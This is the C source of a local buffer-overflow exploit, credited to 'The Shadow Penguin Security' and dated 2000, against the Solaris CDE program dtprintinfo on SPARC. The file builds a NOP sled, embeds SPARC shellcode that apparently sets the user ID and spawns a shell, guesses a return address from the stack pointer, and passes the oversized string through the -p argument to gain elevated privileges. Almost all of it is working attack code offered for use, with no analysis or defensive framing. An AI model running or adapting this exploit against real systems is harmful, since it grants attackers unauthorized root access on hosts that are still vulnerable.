/*========================================================================
   ex_dtprintinfo.c Overflow Exploits( for Sparc Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)
 =========================================================================
*/
#define ADJUST      0
#define OFFSET      1144
#define STARTADR    724
#define BUFSIZE     900
#define NOP 0xa61cc013
static char   x[1000];
unsigned long ret_adr;
int i;
char exploit_code[] =
  "\x82\x10\x20\x17\x91\xd0\x20\x08"
  "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  "\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}
main()
{
  putenv("LANG=");
  for (i = 0; i < ADJUST; i++) x[i]=0x11;
  for (i = ADJUST; i < 900; i+=4)
    {
      x[i+3]=NOP & 0xff;
      x[i+2]=(NOP >> 8 ) &0xff;
      x[i+1]=(NOP >> 16 ) &0xff;
      x[i+0]=(NOP >> 24 ) &0xff;
    }
  for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
  ret_adr=get_sp()-OFFSET;
  printf("jumping address : %lx\n",ret_adr);
  if ((ret_adr & 0xff) ==0 )
    {
      ret_adr -=16;
      printf("New jumping address : %lx\n",ret_adr);
    }
  for (i = ADJUST; i < 600 ; i+=4)
    {
      x[i+3]=ret_adr & 0xff;
      x[i+2]=(ret_adr >> 8 ) &0xff;
      x[i+1]=(ret_adr >> 16 ) &0xff;
      x[i+0]=(ret_adr >> 24 ) &0xff;
    }
  x[BUFSIZE]=0;
  execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
}

/*                    www.hack.co.za              [2000]*/